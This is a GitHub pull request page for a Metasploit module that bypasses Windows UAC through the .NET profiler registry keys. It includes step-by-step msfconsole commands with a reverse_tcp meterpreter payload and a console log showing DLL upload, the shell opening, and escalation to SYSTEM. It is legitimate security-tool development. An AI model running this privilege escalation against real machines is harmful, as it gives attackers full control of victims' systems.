Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Add Windows Escalate UAC Protection Bypass (Via dot net profiler) #12516

merged 4 commits into from Nov 18, 2019


Copy link

bwatters-r7 commented Oct 31, 2019

This is another one of those auto-elevate registry key UAC bypass bugs. It targets the .Net profiler. Rather than launch an exe, it causes a trusted process (gpedit.msc) to load a dll.


List the steps needed to make sure this thing works

  • Start msfconsole
  • get a 64-bit meterpreter session
  • background your session
  • use windows/local/bypassuac_dotnet_profiler
  • set payload windows/x64/meterpreter/reverse_tcp
  • set lhost <lhost>
  • set lport <lport>
  • set session <session>
  • set verbose true
  • run
  • getsystem
  • Verify you are system
  • Do the w00t dance


msf5 exploit(windows/local/bypassuac_dotnet_profiler) > run

[*] Started reverse TCP handler on 
[*] UAC is Enabled, checking level...
[*] Checking admin status...
[+] Part of Administrators group! Continuing...
[+] UAC is set to Default
[+] BypassUAC can bypass this setting, continuing...
[*] win_dir = C:\Windows
[*] tmp_dir = C:\Users\msfuser\AppData\Local\Temp
[*] exploit_dir = C:\Windows\System32\
[*] target_filepath = C:\Windows\System32\gpedit.msc
[*] Making Payload
[*] payload_pathname = C:\Users\msfuser\AppData\Local\Temp\bPwOzAUyQyu.dll
[*] UUID = 5c710086-74fa-4cce-a3fe-af4d318eed8a
[*] Writing  to HKCU\Software\Classes\CLSID\{5c710086-74fa-4cce-a3fe-af4d318eed8a}\InprocServer32
[-] no implicit conversion of nil into Integer
[*] Writing COR_PROFILER to HKCU\Environment
[*] Writing COR_ENABLE_PROFILING to HKCU\Environment
[*] Writing COR_PROFILER_PATH to HKCU\Environment
[*] Uploading Payload to C:\Users\msfuser\AppData\Local\Temp\bPwOzAUyQyu.dll
[*] Payload Upload Complete
[*] Launching C:\Windows\System32\gpedit.msc
[!] This exploit requires manual cleanup of 'C:\Users\msfuser\AppData\Local\Temp\bPwOzAUyQyu.dll!
[*] Please wait for session and cleanup....
[*] Sending stage (206403 bytes) to
[*] Meterpreter session 3 opened ( -> at 2019-10-30 18:05:45 -0500
[*] Removing Registry Changes
[*] Registry Changes Removed

meterpreter > sysinfo
Computer        : DESKTOP-D1E425Q
OS              : Windows 10 (10.0 Build 17134).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x64/windows
meterpreter > getuid
Server username: DESKTOP-D1E425Q\msfuser
meterpreter > getsystem system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > exit
[*] Shutting down Meterpreter...

Copy link

acammack-r7 left a comment

Fun times! Just a little tidying to remember.

bwatters-r7 added 2 commits Nov 15, 2019
Add module docs
@bwatters-r7 bwatters-r7 marked this pull request as ready for review Nov 15, 2019
@bwatters-r7 bwatters-r7 removed the delayed label Nov 15, 2019
@busterb busterb self-assigned this Nov 15, 2019
@busterb busterb added docs and removed needs-docs labels Nov 18, 2019
bcook-r7 pushed a commit that referenced this pull request Nov 18, 2019
@bcook-r7 bcook-r7 merged commit 5936d2c into rapid7:master Nov 18, 2019
3 checks passed
3 checks passed
Metasploit Automation - Sanity Test Execution Successfully completed all tests.
Metasploit Automation - Test Execution Successfully completed all tests.
continuous-integration/travis-ci/pr The Travis CI build passed
msjenkins-r7 added a commit that referenced this pull request Nov 18, 2019

This comment has been minimized.

Copy link

busterb commented Nov 18, 2019

Release Notes

The bypassuac_dotnet_profiler module has been added to the framework. It is a privilege escalation exploit that targets the .Net profiler, causing a trusted process (gpedit.msc) to load a user-controlled DLL.

@tdoan-r7 tdoan-r7 added the rn-modules label Dec 11, 2019
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
None yet
6 participants
You can’t perform that action at this time.